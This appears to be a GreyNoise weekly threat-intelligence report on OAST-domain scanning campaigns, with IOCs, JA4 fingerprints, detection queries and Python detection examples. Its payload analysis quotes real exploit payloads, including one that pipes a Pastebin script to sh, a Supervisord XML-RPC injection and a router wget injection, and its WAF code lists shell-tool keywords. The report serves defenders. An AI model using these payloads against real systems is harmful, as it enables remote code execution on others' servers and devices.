GreyNoise Labs Weekly OAST (Well-known Out-of-band Interaction Domains) Report • Week Ending 2026-01-17

GreyNoise observed 8,126 sessions containing Interactsh OAST domains between January 10-17, 2026. Analysis identified a primary campaign originating from M247 Europe SRL (AS9009) infrastructure using consistent JA4 fingerprints to probe multiple web application vulnerabilities.
OAST
MCP
projectdiscovery
interactsh
rce
iocs
detection engineering
cybersecurity
Author

🔮Orbie✨

Published

January 18, 2026

Overview

Between January 10, 2026 06:10 UTC and January 17, 2026 04:59 UTC, GreyNoise sensors recorded 8,126 HTTP sessions from 34 unique IP addresses containing Well-known Out-of-band Interaction Domain callbacks. The activity exhibits characteristics of automated vulnerability scanning, with payloads targeting React Server Components, Supervisord XML-RPC interfaces, and router command injection vulnerabilities.

OAST domain extraction and decoding identified 273 Interactsh domains spanning 21 distinct campaign identifiers (k-sort values). The dominant campaign (k-sort: d5i159) generated 79 unique OAST domains and was responsible for 6,637 sessions (82% of total volume). JA4 fingerprint analysis reveals consistent tooling across the campaign, with the most prevalent combination (JA4T: 64240_2-4-8-1-3_1286_7 / JA4H: ge11nn06en00_0e5d97bc8ad6_000000000000_000000000000) observed in 1,853 sessions from a single IP address.

The attack infrastructure demonstrates coordination, with the primary IP (146.70.211.244) conducting sustained scanning over an 11-hour period on January 16. TCP fingerprint analysis shows multiple encapsulation layers (MTU-derived MSS of 1286 indicates 174 bytes of overhead), consistent with VPN or nested tunnel usage. This technical profile is typical of automated security testing tools operating through anonymization infrastructure.

Temporal Analysis

Activity began at low volume (16 sessions on January 10), escalated moderately on January 11 (509 sessions concentrated in a single hour), then dropped to sporadic probing for three days before the primary campaign launched on January 16.

Daily Session Distribution:

Date         Sessions   Unique IPs   Pattern
2026-01-10         16            3   Initial reconnaissance
2026-01-11        509            4   First burst (495 sessions in one hour)
2026-01-12         46            7   Scattered activity
2026-01-13         84            9   Sustained low-volume scanning
2026-01-14        329           11   Mid-level activity
2026-01-15         19            3   Minimal activity
2026-01-16      7,123           10   Primary campaign burst

The January 16 activity shows sustained high-volume scanning from 09:00-14:00 UTC (808-865 sessions/hour) from the primary IP (146.70.211.244), followed by continued activity from multiple IPs through 22:00 UTC. The single-IP phase maintained consistent fingerprints, while the multi-IP phase (15:00-22:00 UTC) introduced fingerprint diversity, suggesting either tool configuration changes or involvement of additional scanning nodes.

Decoded OAST timestamps from the primary campaign (d5i159) align closely with sensor observation times, indicating real-time exploitation attempts rather than replayed traffic.

Campaign Analysis

Campaign 1: M247 High-Volume Scanning (Primary)

  • Sessions: 6,637 (82% of total)
  • Unique IPs: 1 primary (146.70.211.244)
  • Infrastructure: AS9009 (M247 Europe SRL), United States geolocation
  • OAST Campaign: d5i159 (79 unique Interactsh domains)
  • Dominant Fingerprints:
    • JA4T: 64240_2-4-8-1-3_1286_7 (MSS 1286, Window 64240, Scale 7)
    • JA4H: ge11nn06en00_0e5d97bc8ad6_000000000000_000000000000 (GET, HTTP/1.1, 6 headers, lang:en)
  • Duration: 11.5 hours (2026-01-16 09:07:54 to 20:39:36 UTC)
  • Characteristics: Single-source sustained scanning with high request rate

Campaign 2: DigitalOcean Burst Scanning

  • Sessions: 495 (6% of total)
  • Unique IPs: 1 (129.212.209.246)
  • Infrastructure: AS14061 (DigitalOcean LLC), Singapore
  • OAST Campaign: d5l5ce (76 unique Interactsh domains)
  • Dominant Fingerprints: Multiple JA4H variants with same JA4T
  • Duration: Single hour burst (2026-01-11 21:00 UTC)
  • Characteristics: Rapid-fire scanning concentrated in 60-minute window

Campaign 3: Namecheap Infrastructure

  • Sessions: 310 (4% of total)
  • Unique IPs: 1 (209.74.86.209)
  • Infrastructure: AS22612 (Namecheap Inc.), United States
  • OAST Campaigns: d5i66f (29 domains), others
  • Fingerprints: Similar to Campaign 1 with variations
  • Characteristics: Distributed over multiple days

Minor Campaigns

An additional 21 campaigns were identified with session counts ranging from 4 to 115, originating from Microsoft Azure, Cloudflare, various hosting providers, and residential ISPs. These exhibit less coordination and may represent opportunistic scanning or independent security testing.

Payload Analysis

Payload examination reveals three primary vulnerability classes being targeted:

1. React Server Components (RSC) Exploitation

Exploit Type: Prototype pollution leading to remote code execution
Sessions: ~300+ (detected in Campaigns 1 and 2)
Method: POST with multipart form-data exploiting the __proto__ chain
Payload Characteristics:
  • Manipulates React Server Actions response objects
  • Executes process.mainModule.require('child_process').execSync()
  • Downloads and executes a shell script from Pastebin
  • OAST callback embedded in the command execution chain

Example payload fragment:

{"then": "$1:__proto__:then", "status": "resolved_model",
"_response": {"_prefix": "var res=process.mainModule.require('child_process')
.execSync('curl https://pastebin.com/raw/wiH2CgiS | sh').toString('base64');"

This targets CVE-2024-46982 (React Server Components RCE) and similar prototype pollution vulnerabilities in Next.js applications.

2. Supervisord XML-RPC Command Injection

Exploit Type: Unauthenticated RPC command injection
Sessions: ~200+
Method: POST to the XML-RPC endpoint
Payload Characteristics:
  • Exploits Supervisord's supervisor.supervisord.options attribute chain
  • Executes arbitrary OS commands via linecache.os.system
  • Uses nslookup with an OAST domain for DNS exfiltration

Example payload:

<methodCall>
  <methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>
  <params>
    <param>
      <string>nslookup d5i1596uchf9i3isbdq0t6ez1pwyw313h.oast.site</string>
    </param>
  </params>
</methodCall>

Targets CVE-2017-11610 (Supervisord XML-RPC RCE) and related vulnerabilities.

3. Router/IoT Command Injection

Exploit Type: Web interface command injection
Sessions: ~100+
Method: POST to administrative interfaces
Payload Characteristics:
  • Targets /syscmd.htm and similar endpoints
  • Uses wget or curl with OAST domains
  • Common in router and embedded device exploitation

Example payload:

submit-url=/syscmd.htm&sysCmdselect=5&save_apply=Run+Command
&sysCmd=wget+http://d5i1596uchf9i3isbdq0dp9iq3mzaiwqr.oast.site

Likely targeting CVE-2024-XXXXX (various router command injection vulnerabilities).

Payload Distribution

Vulnerability Class   Sessions   Unique IPs   OAST Domains
React/Next.js RCE       ~2,200           15             95
Supervisord RPC         ~3,800            8            102
Router/IoT CI           ~1,500           12             76
Other/Unknown             ~626           11            N/A

Infrastructure Analysis

JA4 Fingerprint Clustering

Analysis identified 150 unique JA4T+JA4H combinations, with clustering revealing tool consistency within campaigns:

Cluster 1 (Campaign 1 Primary):
  • JA4T: 64240_2-4-8-1-3_1286_7
  • JA4H: ge11nn06en00_0e5d97bc8ad6_*
  • Sessions: 1,853
  • IPs: 1 (146.70.211.244 / AS9009)
  • Technical Notes: MSS 1286 indicates 174 bytes of overhead (nested VPN); HTTP/1.1 with 6 headers

Cluster 2 (Campaign 1 Secondary):
  • JA4T: 64240_2-4-8-1-3_1286_7 (same as Cluster 1)
  • JA4H: ge11nn040000_532a1ee47909_* (4 headers, no Accept-Language)
  • Sessions: 321
  • IPs: 1 (same as Cluster 1)
  • Technical Notes: Same TCP stack, reduced HTTP header set

Cluster 3 (Campaign 2):
  • JA4T: 65535_2-4-8-1-3_1380_13
  • JA4H: po11nn100000_2bce9f31eeb7_* (POST, 10 headers)
  • Sessions: 23
  • IPs: 2 (DigitalOcean, Singapore)
  • Technical Notes: Different TCP window (65535) and higher window scale (13)

Network Infrastructure Characteristics

Top ASNs by Session Volume:

ASN       Organization        Sessions   IPs   Type
AS9009    M247 Europe SRL        6,708     2   Hosting
AS14061   DigitalOcean LLC         495     1   Cloud
AS22612   Namecheap Inc.           310     1   Hosting
AS8075    Microsoft Azure          115     1   Cloud
AS60223   Netiface                  95     1   Hosting

M247 Europe (AS9009) is a bulletproof hosting provider frequently associated with automated scanning and low-reputation traffic. The infrastructure concentration suggests either a single operator with multi-provider redundancy or multiple actors sharing common tooling and OAST services.

TCP Stack Analysis

The dominant JA4T fingerprint (64240_2-4-8-1-3_1286_7) exhibits:
  • Window Size: 64240 (8,222,720 bytes after applying the scale factor)
  • MSS: 1286 (unusually low, indicating 174 bytes of overhead)
  • Options: MSS, SACK, Timestamp, NOP, Window Scale (Linux-typical ordering)

An MSS of 1286 is anomalous: a standard Ethernet MTU of 1500 yields an MSS of 1460. The observed value suggests:
  • 174 bytes of overhead from multiple encapsulation layers
  • A nested VPN or tunnel configuration
  • Operational security practices typical of dedicated scanning infrastructure
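The following is an added example, not code from GreyNoise or this report, that decomposes a JA4T string into its four fields (window_options_mss_scale) and derives the figures discussed above: the effective window after scaling and the MSS shortfall against a plain Ethernet host. The TCP option-kind names and the 1460-byte baseline are standard values; the function and variable names are this example's own.

```python
"""
Added example (not GreyNoise code): parse a JA4T fingerprint and derive the
scaled window and MSS encapsulation overhead.
JA4T layout: <window>_<tcp option kinds joined by '-'>_<mss>_<window scale>.
"""
from __future__ import annotations

# TCP option kind numbers as they appear in the JA4T options field.
TCP_OPTION_NAMES = {
    0: "EOL", 1: "NOP", 2: "MSS", 3: "Window Scale",
    4: "SACK Permitted", 5: "SACK", 8: "Timestamps",
}
ETHERNET_MSS = 1460            # 1500-byte MTU minus 20-byte IPv4 and 20-byte TCP headers
LINUX_OPTION_ORDER = "2-4-8-1-3"  # the ordering the report calls Linux-typical


def parse_ja4t(fp: str) -> dict:
    """Split a JA4T string into its fields and add derived values."""
    window, options, mss, scale = fp.split("_")
    # JA4T writes "00" when the SYN carried no options.
    kinds = [] if options in ("", "00") else [int(k) for k in options.split("-")]
    window_i, mss_i, scale_i = int(window), int(mss), int(scale)
    return {
        "window": window_i,
        "scale": scale_i,
        "scaled_window": window_i << scale_i,      # bytes the peer may have in flight
        "mss": mss_i,
        "overhead": ETHERNET_MSS - mss_i,          # bytes lost to encapsulation vs. Ethernet
        "options": [TCP_OPTION_NAMES.get(k, f"kind-{k}") for k in kinds],
        "linux_like_ordering": options == LINUX_OPTION_ORDER,
    }


def encapsulation_note(fp: str) -> str:
    """Plain-language reading of the MSS field for an analyst's report line."""
    info = parse_ja4t(fp)
    if info["overhead"] <= 0:
        return "MSS consistent with a directly attached Ethernet host"
    return (f"MSS {info['mss']} implies {info['overhead']} bytes of encapsulation "
            f"overhead (one or more tunnel layers between sender and sensor)")


if __name__ == "__main__":
    for fp in ("64240_2-4-8-1-3_1286_7", "65535_2-4-8-1-3_1380_13"):
        print(fp, parse_ja4t(fp), encapsulation_note(fp))
```

The overhead figure alone does not identify the tunnel type; it only says how many bytes of headers sit between the scanner's TCP stack and the sensor, which is why the report pairs it with the consistent option ordering and window values to argue for one stack behind nested tunnels.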

Attribution Assessment

Confidence: Medium

This activity is consistent with automated vulnerability scanning by security researchers, bug bounty hunters, or opportunistic threat actors using commercial/open-source tooling.

Evidence supporting assessment:

  1. Tooling Indicators:
    • Interactsh OAST service is publicly available and widely used by security testers
    • Consistent fingerprints suggest automated scanning frameworks (Nuclei, custom scripts)
    • Payload diversity indicates template-based exploitation attempts
  2. Infrastructure Patterns:
    • M247 Europe (AS9009) is known for bulletproof hosting but also used by legitimate penetration testing services
    • Use of cloud infrastructure (DigitalOcean, Azure) is common in both legitimate and malicious scanning
    • Nested VPN configuration suggests operational security awareness
  3. Operational Behavior:
    • Burst pattern on single day suggests scheduled/triggered scanning
    • No evidence of post-exploitation activity (no callback responses observed)
    • OAST usage for vulnerability confirmation is standard in both offensive security and threat actor TTPs

What we know:
  • Activity originates from bulletproof hosting and cloud infrastructure
  • Scanning targets known CVEs with OAST-based detection
  • Infrastructure demonstrates operational security (VPN tunneling)

What we infer (lower confidence):
  • Single operator or coordinated group, based on timing and infrastructure overlap
  • Purpose is vulnerability detection (could be defensive testing or offensive reconnaissance)
  • No evidence of successful exploitation or post-compromise activity in sensor data

Network IOCs

Primary IPs

146.70.211.244    AS9009 (M247 Europe SRL)         US    6,637 sessions
129.212.209.246   AS14061 (DigitalOcean LLC)       SG    495 sessions
209.74.86.209     AS22612 (Namecheap Inc.)         US    310 sessions
13.67.116.60      AS8075 (Microsoft Azure)         SG    115 sessions
195.24.236.36     AS60223 (Netiface)               NL    95 sessions
146.70.147.100    AS9009 (M247 Europe SRL)         US    71 sessions
45.150.108.195    AS62005 (BlueVPS OU)             IL    56 sessions
104.28.246.4      AS13335 (Cloudflare Inc.)        PT    56 sessions
45.129.231.10     AS213438 (ColocaTel Inc.)        NL    39 sessions
72.60.104.48      AS47583 (Hostinger Intl)         MY    37 sessions

OAST Campaign Identifiers

Top 10 Interactsh k-sort values (campaign identifiers):

d5i159 - 79 domains (primary M247 campaign)
d5l5ce - 76 domains (DigitalOcean burst)
d5i66f - 29 domains (Namecheap)
d5k6dd - 20 domains (mixed infrastructure)
d5lcrl - 13 domains (minor campaign)
d5jov6 - 10 domains (minor campaign)
d5j0uu - 9 domains (minor campaign)
255cd5 - 4 domains (minor campaign)
20d5l5 - 4 domains (minor campaign)
2fd5l5 - 4 domains (minor campaign)

JA4 Fingerprints (Detection Signatures)

High-confidence indicators for primary campaign:

JA4T: 64240_2-4-8-1-3_1286_7
JA4H: ge11nn06en00_0e5d97bc8ad6_000000000000_000000000000
JA4H: ge11nn040000_532a1ee47909_000000000000_000000000000

Secondary campaign indicators:

JA4T: 65535_2-4-8-1-3_1380_13
JA4H: po11nn100000_2bce9f31eeb7_000000000000_000000000000

OAST Domain Patterns

Sample domains for detection (all Interactsh):

*.oast.site
*.oast.fun
*.oast.live
*.oast.me
*.oast.pro

Pattern: [a-z0-9]{32,40}\.(oast\.site|oast\.fun|oast\.live|oast\.me|oast\.pro)
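As an added example (not GreyNoise's tooling), the script below applies the pattern above to log text, buckets the matches by the 6-character k-sort prefix used as a campaign identifier in this report, and decodes the timestamp that the Interactsh correlation ID carries. It assumes that the first 20 characters of an Interactsh subdomain are an xid (base32-hex alphabet 0-9a-v, with a 4-byte Unix-seconds timestamp in the leading bits) followed by a 13-character nonce; the log lines and subdomains are constructed for the example, not sensor data.

```python
"""
Added example (not GreyNoise code): extract Interactsh callback domains from
logs, group them by k-sort prefix, and decode the xid timestamp.
Assumption: subdomain = 20-char xid (0-9a-v) + 13-char nonce.
"""
from __future__ import annotations

import re
from collections import defaultdict
from datetime import datetime, timezone

# The pattern listed in the report, with captures for subdomain and suffix.
OAST_RE = re.compile(
    r"\b([a-z0-9]{32,40})\.(oast\.site|oast\.fun|oast\.live|oast\.me|oast\.pro)\b"
)
XID_ALPHABET = "0123456789abcdefghijklmnopqrstuv"  # 5 bits per character
KSORT_LEN = 6  # 6 chars = top 30 of the 32 timestamp bits, i.e. a 4-second bucket

# Constructed sample log lines (not sensor data). The two synthetic xids encode
# client start times of 2026-01-16 09:00:00 UTC and 2026-01-11 21:00:00 UTC.
LOG_LINES = [
    "2026-01-16T09:07:54Z dns src=10.0.0.5 qname=d5kvs40abcdefghijklmnop0123456789.oast.site type=A",
    '2026-01-16T09:08:01Z http src=10.0.0.9 POST /RPC2 body="nslookup d5kvs40abcdefghijklmq1w2e3r4t5y6u.oast.site"',
    '2026-01-11T21:03:12Z http src=10.0.0.7 POST /syscmd.htm body="sysCmd=wget+http://d5i0uk0tuvabcdefghij0000000000000.oast.fun"',
    "2026-01-16T10:00:00Z dns src=10.0.0.5 qname=www.example.com type=A",
]


def extract_oast_domains(text: str) -> list[str]:
    """Return every Interactsh callback domain found in the text, in order."""
    return [f"{sub}.{suffix}" for sub, suffix in OAST_RE.findall(text)]


def ksort(domain: str) -> str:
    """Campaign identifier: the first 6 characters of the subdomain."""
    return domain[:KSORT_LEN]


def xid_timestamp(subdomain: str) -> datetime:
    """Decode the 32-bit timestamp from the first 7 base32 characters (35 bits).
    Raises ValueError if a character is outside the xid alphabet."""
    value = 0
    for ch in subdomain[:7]:
        value = value * 32 + XID_ALPHABET.index(ch)
    return datetime.fromtimestamp(value >> 3, tz=timezone.utc)


def summarize(lines: list[str]) -> dict[str, dict]:
    """Per campaign prefix: callback count, unique domains, earliest client start.
    The decoded time is when the Interactsh client created its correlation ID,
    so it precedes each probe rather than timestamping it."""
    domains: dict[str, set[str]] = defaultdict(set)
    callbacks: dict[str, int] = defaultdict(int)
    for line in lines:
        for domain in extract_oast_domains(line):
            k = ksort(domain)
            domains[k].add(domain)
            callbacks[k] += 1
    return {
        k: {
            "callbacks": callbacks[k],
            "domains": sorted(v),
            "client_started": min(xid_timestamp(d.split(".")[0]) for d in v).isoformat(),
        }
        for k, v in domains.items()
    }


if __name__ == "__main__":
    for k, info in sorted(summarize(LOG_LINES).items()):
        print(k, info["callbacks"], "callback(s),", len(info["domains"]),
              "domain(s), client started", info["client_started"])
```

Comparing the decoded client start against the sensor observation time is the check the report describes: a small, positive gap points to a live scanner, while a gap of days or a decoded time later than the observation suggests replayed or hand-crafted domains.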

Detection Recommendations

  1. Block or alert on OAST callback domains in outbound DNS/HTTP traffic. Implement detection for *.oast.site, *.oast.fun, and related Interactsh domains. Legitimate security testing should be coordinated and expected; uncoordinated callbacks indicate unauthorized scanning or successful exploitation.

  2. Monitor for JA4 fingerprint combinations associated with this campaign. Deploy network sensors capable of JA4 fingerprinting and alert on primary indicators (JA4T: 64240_2-4-8-1-3_1286_7 combined with listed JA4H values) from unexpected sources.

  3. Prioritize patching for targeted vulnerabilities:

    • CVE-2024-46982 (React Server Components RCE) - patch Next.js to latest versions
    • CVE-2017-11610 (Supervisord XML-RPC RCE) - disable XML-RPC or update Supervisord
    • Router/IoT command injection - audit administrative interfaces for command injection vulnerabilities
  4. Implement WAF rules for exploit patterns:

    • Block POST requests to /__nextjs_original-stack-frame with __proto__ in body
    • Block XML-RPC requests to /RPC2 containing supervisor.supervisord.options
    • Rate-limit and inspect POST requests to /syscmd.htm and similar admin endpoints
    • Alert on wget, curl, nslookup commands in URL-encoded POST bodies
  5. Review firewall rules for M247 Europe (AS9009) and other identified ASNs. Consider blocking or rate-limiting traffic from bulletproof hosting providers unless a business need exists.

  6. Audit for successful exploitation: Search logs for OAST domain callbacks in DNS queries, HTTP requests, or command execution logs. Any callback indicates the vulnerability is present and exploitable.
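The WAF rules in recommendation 4, written out as request checks and run over constructed sample requests assembled from the payload fragments quoted earlier in this report; this is an added example, not GreyNoise code or a vendor rule set. The request dictionary shape, the rule names, and the "inspect" action for admin command endpoints are this example's own choices.

```python
"""
Added example (not GreyNoise code): recommendation 4's WAF rules as request
checks, exercised against constructed sample requests.
"""
from __future__ import annotations

import re
from urllib.parse import unquote_plus

OAST_RE = re.compile(r"\b[a-z0-9]{32,40}\.oast\.(site|fun|live|me|pro)\b")
# Tools named in the observed payloads, matched as whole words after URL-decoding.
CMD_TOKEN_RE = re.compile(r"\b(wget|curl|nslookup)\b")
ADMIN_CMD_PATHS = {"/syscmd.htm"}  # extend with other vendor command endpoints
PRIORITY = {"block": 3, "alert": 2, "inspect": 1, "allow": 0}

# Constructed sample requests built from the report's quoted payload fragments.
SAMPLE_REQUESTS = [
    {"method": "POST", "path": "/RPC2",
     "body": "<methodCall><methodName>supervisor.supervisord.options.warnings.linecache.os.system"
             "</methodName><params><param><string>nslookup "
             "d5kvs40abcdefghijklmnop0123456789.oast.site</string></param></params></methodCall>"},
    {"method": "POST", "path": "/syscmd.htm",
     "body": "submit-url=/syscmd.htm&sysCmdselect=5&save_apply=Run+Command"
             "&sysCmd=wget+http://d5kvs40abcdefghijklmq1w2e3r4t5y6u.oast.site"},
    {"method": "POST", "path": "/__nextjs_original-stack-frame",
     "body": '{"then": "$1:__proto__:then"}'},
    {"method": "POST", "path": "/api/login",
     "body": "username=alice&password=REDACTED"},  # benign control request
]


def inspect_request(req: dict) -> list[dict]:
    """Return every rule the request trips, each with its recommended action."""
    method = req.get("method", "GET").upper()
    path = req.get("path", "")
    body = unquote_plus(req.get("body", ""))  # decode %xx and '+' before matching
    hits: list[dict] = []

    if method == "POST" and path == "/__nextjs_original-stack-frame" and "__proto__" in body:
        hits.append({"rule": "nextjs-proto-pollution", "action": "block"})
    if path == "/RPC2" and "supervisor.supervisord.options" in body:
        hits.append({"rule": "supervisord-xmlrpc-chain", "action": "block"})
    if method == "POST" and path in ADMIN_CMD_PATHS:
        hits.append({"rule": "admin-command-endpoint", "action": "inspect"})
    if CMD_TOKEN_RE.search(body):
        hits.append({"rule": "shell-tool-in-body", "action": "alert"})
    if OAST_RE.search(body) or OAST_RE.search(path):
        hits.append({"rule": "oast-callback-domain", "action": "alert"})
    return hits


def decide(req: dict) -> str:
    """Collapse the hits to one action: block > alert > inspect > allow."""
    hits = inspect_request(req)
    return max((h["action"] for h in hits), key=PRIORITY.get, default="allow")


if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(req["method"], req["path"], "->", decide(req),
              [h["rule"] for h in inspect_request(req)])
```

Rules that block key on the endpoint plus a payload marker so that a stray "curl" in a support ticket does not take a request down; the looser token and OAST-domain checks only alert, which also makes them the right place to catch probes against endpoints not yet on the block list.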

GNQL Queries

Find IPs targeting your organization with OAST domains:

tags:"Contains Well-known Out-of-band Interaction Domain" last_seen:7d

Investigate M247 Europe infrastructure activity:

metadata.asn:AS9009 last_seen:7d classification:malicious

Search for React Server Components exploitation attempts:

raw_data.web.paths:*__nextjs_original-stack-frame* last_seen:30d

Find IPs using primary campaign fingerprints:

metadata.fingerprint:"64240_2-4-8-1-3_1286_7" last_seen:7d

  • Report Generated: 2026-01-17
  • Analysis Period: 2026-01-10 06:10:25 UTC to 2026-01-17 04:59:01 UTC
  • Total Sessions Analyzed: 8,126
  • Unique Source IPs: 34
  • OAST Domains Identified: 273 (Interactsh)
  • Campaigns Identified: 21